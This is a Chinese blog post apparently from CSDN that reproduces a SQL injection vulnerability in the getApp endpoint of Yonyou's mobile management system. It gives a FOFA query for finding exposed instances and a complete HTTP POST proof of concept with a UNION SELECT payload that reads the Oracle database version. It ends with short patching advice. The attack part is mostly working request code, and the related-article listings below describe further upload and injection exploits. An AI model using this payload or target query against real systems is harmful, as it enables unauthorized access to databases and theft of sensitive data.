【漏洞复现】用友移动管理系统 getApp SQL注入漏洞

最新推荐文章于 2024-09-12 04:35:33 发布
最新推荐文章于 2024-09-12 04:35:33 发布
阅读量453 收藏 9
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KKleeeaa/article/details/136010018
版权

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

用友移动管理系统中的 getApp 功能点没有对用户的输入进行关键字符过滤,导致存在SQL注入漏洞。攻击者可以进一步获取敏感信息

0x01FOFA语句

app="用友-移动系统管理"

0x02漏洞POC

POST /mobsm/common/../appManage/getApp HTTP/1.1
Host: xxxxxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
 
pk_dvcmngmnt=0' union select banner,'test+SQLi',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from sys.v_$version where rownum=1--+

查询数据库版本号

SQLMap补充

0x03修复建议

关闭在互联网上的暴露面或设置接口的访问权限

更新补丁

Aniya也会哭
关注
专栏目录
漏洞复现用友-移动系统管理-uploadIcon-任意文件上传
知黑而守白
01-26 121
用友移动系统管理用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理允许攻击者通过 uploadIcon 接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
漏洞复现用友 NC-Cloud queryStaffByName Sql注入漏洞
最新发布
alert['Hello World']
09-23 646
用友 NC-Cloud queryStaffByName 处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 5480
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
用友移动管理系统任意文件上传漏洞
CommputerMac的博客
09-29 466
然后访问 http://ip:port/maupload/apk/hacker.jsp 返回如下。批量检测脚本 关注微信公众号 网络安全透视镜 回复 20230929 获取。用友移动管理系统 uploadApk.do 文件存在任意文件上传。将上传内容换成木马即可,例如使用冰蝎马连接。返回如下,则文件上传成功。
用友移动管理系统 getApp SQL注入漏洞复现
0xSec
01-27 374
用友移动管理系统 getApp功能点未对用户的输入进行过滤,导致存在SQL注入漏洞,利用此漏洞攻击者可以获取数据库敏感信息及凭证,使系统处于极度不安全状态。
用友移动管理系统 任意文件上传漏洞复现
0xSec
08-12 2369
用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
漏洞复现用友-移动系统管理-getApp-sql注入
知黑而守白
01-26 108
用友移动系统管理用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理 getApp 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
用友-移动系统管理-getApp-sql注入(含批量验证poc)
weixin_43567873的博客
04-09 47
用友-移动系统管理-getApp-sql注入(含批量验证poc)
getapp影视系统搭建服务,原生态APP系统一条龙搭建服务
2401_82356804的博客
01-01 607
getapp影视系统搭建服务,原生态APP系统一条龙搭建服务,私有源码,不用授权,不用担心跑路。get最大特点:简洁,开源,内页加载非常快,播放器加载也很快,整体就是丝丝顺滑,不搞任何花里胡哨的页面,欢迎体验演示站。APP包涵后端源码与APP插件,前端自己可以打包原生态安卓apk+送苹果免签安装包(再也不用担心掉签名问题),免签版本送首图两套正版模板,安全无后门,本人已经优化,界面非常漂亮。收货再送电脑端同时再赠送APP分发下载(再也不用担心网盘续费问题),真正白菜价格!懂行的老铁欢迎来撩。
【操作指南】工业控制系统远程访问的配置和管理.zip
10-18
【操作指南】工业控制系统远程访问的配置和管理zip,【操作指南】工业控制系统远程访问的配置和管理
漏洞标题: 中国移动mas2.0平台系统漏洞
fengling132的专栏
05-10 2106
漏洞详情 披露状态: 2012-03-26: 细节已通知厂商并且等待厂商处理中 2012-03-26: 厂商已经确认,细节仅向厂商公开 2012-04-05: 细节向核心白帽子及相关领域专家公开 2012-04-15: 细节向普通白帽子公开 2012-04-25: 细节向见习白帽子公开 2012-05-10: 细节向公众公开 简要描述: MAS是中国移动的短信
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 946
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
漏洞复现用友 NC pagesServlet Sql注入漏洞
alert['Hello World']
09-12 344
用友 NC doPost 接口 pagesServlet 参数存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
用友移动管理系统 任意文件上传漏洞[2023-HW]
holyxp的博客
08-16 617
用友移动系统管理用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
泛微移动平台e-mobile漏洞利用的修复方案
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-14 5331
泛微移动平台e-mobile漏洞利用的修复方案1. 对产生漏洞模块的传入参数进行有效性检测,对传入的参数进行限定2. 当用户输入限定字符时,立刻转向自定义的错误页,不能使用服务器默认的错误输出方式 3. 对以上标签进行危险字符过滤,禁止('、"、+、%、&、、()、;、and、select等)特殊字符的传入 4. 加密数据库内存储信息 5. 与数据库链接并访问数据时,使用参数化查询方式进行链接访问
泛微E-Mobile /client.do 命令执行漏洞复现
0xSec
04-04 2301
泛微E-Mobile存在命令执行漏洞,攻击者可以通过/client.do执行任意命令执行,从而获得服务器权限。
用友移动管理系统 多处文件上传漏洞复现
0xSec
01-10 715
用友移动管理系统 /maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
致远M3移动办公系统平台存在敏感信息泄露/未授权访问漏洞
weixin_43167326的博客
05-07 1492
致远M3移动办公是致远互联打造的一站式智能工作平台,提供全方位的企业移动业务管理,致力于构建以人为中心的智能化移动应用场景,促进人员工作积极性和创造力,提升企业效率和效能,是为企业量身定制的移动智慧协同平台。在致远M3 server以下日志文件允许未授权访问泄露登陆用户名及session等敏感信息。
漏洞复现】泛微e-Mobile 移动管理平台文件上传漏洞
qq_34780861的博客
04-25 2990
泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台存在任意文件上传漏洞
uniapp getApp 报错
06-10
可能是因为你在使用 `getApp()` 方法时,没有在当前页面或组件的 `methods` 中定义 `getApp()` 方法。正确的做法是在当前页面或组件的 `methods` 中定义 `getApp()` 方法,如下所示: ```javascript methods: { getApp() { return getApp(); } } ``` 如果问题仍然存在,请提供更多的错误信息或代码片段,以便我更好地为你解决问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值